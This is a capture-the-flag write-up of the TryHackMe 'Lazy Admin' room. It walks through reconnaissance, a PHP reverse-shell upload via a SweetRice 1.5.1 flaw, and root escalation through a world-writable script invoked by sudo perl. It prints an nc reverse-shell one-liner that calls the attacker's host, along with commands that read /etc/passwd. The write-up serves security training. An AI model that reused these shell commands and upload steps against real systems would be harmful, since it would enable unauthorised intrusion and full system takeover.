https://tryhackme.com/room/lazyadmin

💭 Thoughts after doing the room

I didn’t explore all attack vectors in this room. On the TryHackMe page, the only information given was “Have some fun! There might be multiple ways to get user access.” I think I used the most common method.

The Sweet-Rice CMS was quite exotic, so when I googled it, I found more TryHackMe write-ups than CMS documentation to get the default password. As for the root part, I enjoyed the challenge of having to discover that www-data had access to another home directory.

Overall, it was pretty straightforward, but not very exciting. I think it would have been more enjoyable if I hadn’t googled for exploits of that version. Then, I would have had to find my own way into the machine.

Task 1: Lazy Admin

What is the user flag?

No hints and no other text provided. Trying nmap default scan first

root@ip-10-10-123-222:~# IP=10.10.42.146
root@ip-10-10-123-222:~# nmap -T4 $IP

Starting Nmap 7.60 ( https://nmap.org ) at 2023-04-02 20:41 BST
Nmap scan report for ip-10-10-42-146.eu-west-1.compute.internal (10.10.42.146)
Host is up (0.0011s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 02:DF:1D:DF:D1:75 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 1.66 seconds

Checking the webpage, its just a default apache site. Further nmap testing information gathering

root@ip-10-10-123-222:~# nmap -p80 -sV -sC $IP

Starting Nmap 7.60 ( https://nmap.org ) at 2023-04-02 20:43 BST
Nmap scan report for ip-10-10-42-146.eu-west-1.compute.internal (10.10.42.146)
Host is up (0.00019s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
MAC Address: 02:DF:1D:DF:D1:75 (Unknown)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.79 seconds

Bruteforcing common wordlist on the http server to see if there is anything

root@ip-10-10-123-222:~# gobuster dir --url $IP -w /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.42.146
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/SecLists/Discovery/Web-Content/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2023/04/02 20:46:29 Starting gobuster
===============================================================
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/.hta (Status: 403)
/content (Status: 301)
/index.html (Status: 200)
/server-status (Status: 403)
===============================================================
2023/04/02 20:46:33 Finished
===============================================================

/content looks interesting. It shows this page

It shows that it’s powered by SweetRice and a page that looks like it’s just setup. So I’ll google for default credentials and path to the admin interface first.

Google shows the password as text snippet before visiting any page. Almost all search results are TryHackMe writeups ^^ so I don’t click one to avoid spoilers.

I can login sucessfully with the credentials. I see that it has version 1.5.1

First I enable the site like described on the first landing page I saw.

to check if it renders. I could try to find a way to upload a file manually now. But I first try with googling “SweetRice exploit 1.5.1”, the first entry was SweetRice 1.5.1 - Cross-Site Request Forgery / PHP Code Execution which says that it’s possible to upload a file in the Ads section. So I upload the popular php one from PentestMonkey. The ExploitDB entry also tells the location of the script.

So I start a listener with nc and access the URL in the browser like this http://10.10.42.146/content/inc/ads/reversephp.php

root@ip-10-10-123-222:~# nc -nvlp 1337
Listening on [0.0.0.0] (family 0, port 1337)
Connection from 10.10.42.146 38976 received!
Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
 23:28:37 up 49 min,  0 users,  load average: 0.12, 0.04, 0.01
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ pwd
/
$ cat /etc/passwd 
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
itguy:x:1000:1000:THM-Chal,,,:/home/itguy:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
guest-3myc2b:x:998:998:Guest:/tmp/guest-3myc2b:/bin/bash
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin
$ find / -name user.txt 2>/dev/null 
/home/itguy/user.txt
$ cat /home/itguy/user.txt
THM{🤐}

I first checked which user I’m logged in with, then checked if the passwd file to see users and the UID 1000 is interesting. But I then decided to just search the user flag with the commonly known filename.

The 2>/dev/null is to avoid permission errors. Those errors are written to /dev/null instead to screen outout.

What is the root flag?

Now I’ll check sudo privileges like usually.

$ sudo -l
Matching Defaults entries for www-data on THM-Chal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on THM-Chal:
    (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl

It shows that I can use perl as root but just for the file /home/itguy/backup.pl

This probably requires doing more with the terminal session, so I’ll upgrade to a better shell. I check with which python if python exists and then execute

python -c 'import pty;pty.spawn("/bin/bash")'

I output the perl script

www-data@THM-Chal:/home/itguy$ cat backup.pl
cat backup.pl
#!/usr/bin/perl

system("sh", "/etc/copy.sh");

I check the permissions for copy.sh

www-data@THM-Chal:/etc$ stat copy.sh
stat copy.sh
  File: 'copy.sh'
  Size: 81        	Blocks: 8          IO Block: 4096   regular file
Device: ca01h/51713d	Inode: 1050508     Links: 1
Access: (0647/-rw-r--rwx)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2023-04-02 23:44:27.980000000 +0300
Modify: 2019-11-29 13:45:39.542648714 +0200
Change: 2019-11-29 13:45:39.542648714 +0200
 Birth: -

I see that it’s writeably by anyone.

www-data@THM-Chal:/etc$ cat copy.sh
cat copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.190 5554 >/tmp/f

If I output the file it conveniently already contains a reverse shell, just with the wrong IP.

So I adapt it and overwrite the current contents.

www-data@THM-Chal:/etc$ echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.123.222 4242 >/tmp/f" > /etc/copy.sh
<;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.123.222 4242 >/tmp/f" > /etc/copy.sh   
www-data@THM-Chal:/etc$ 

www-data@THM-Chal:/etc$ 

www-data@THM-Chal:/etc$ cat copy.sh
cat copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.123.222 4242 >/tmp/f

Then I execute the file with sudo and perl

www-data@THM-Chal:/home/itguy$ which perl
which perl
/usr/bin/perl
www-data@THM-Chal:/home/itguy$ sudo /usr/bin/perl /home/itguy/backup.pl 
sudo /usr/bin/perl /home/itguy/backup.pl
rm: cannot remove '/tmp/f': No such file or directory

It executes and I get the root shell

# whoami
root
# cd /root
# ls
root.txt
# cat root.txt
THM{🤐}
#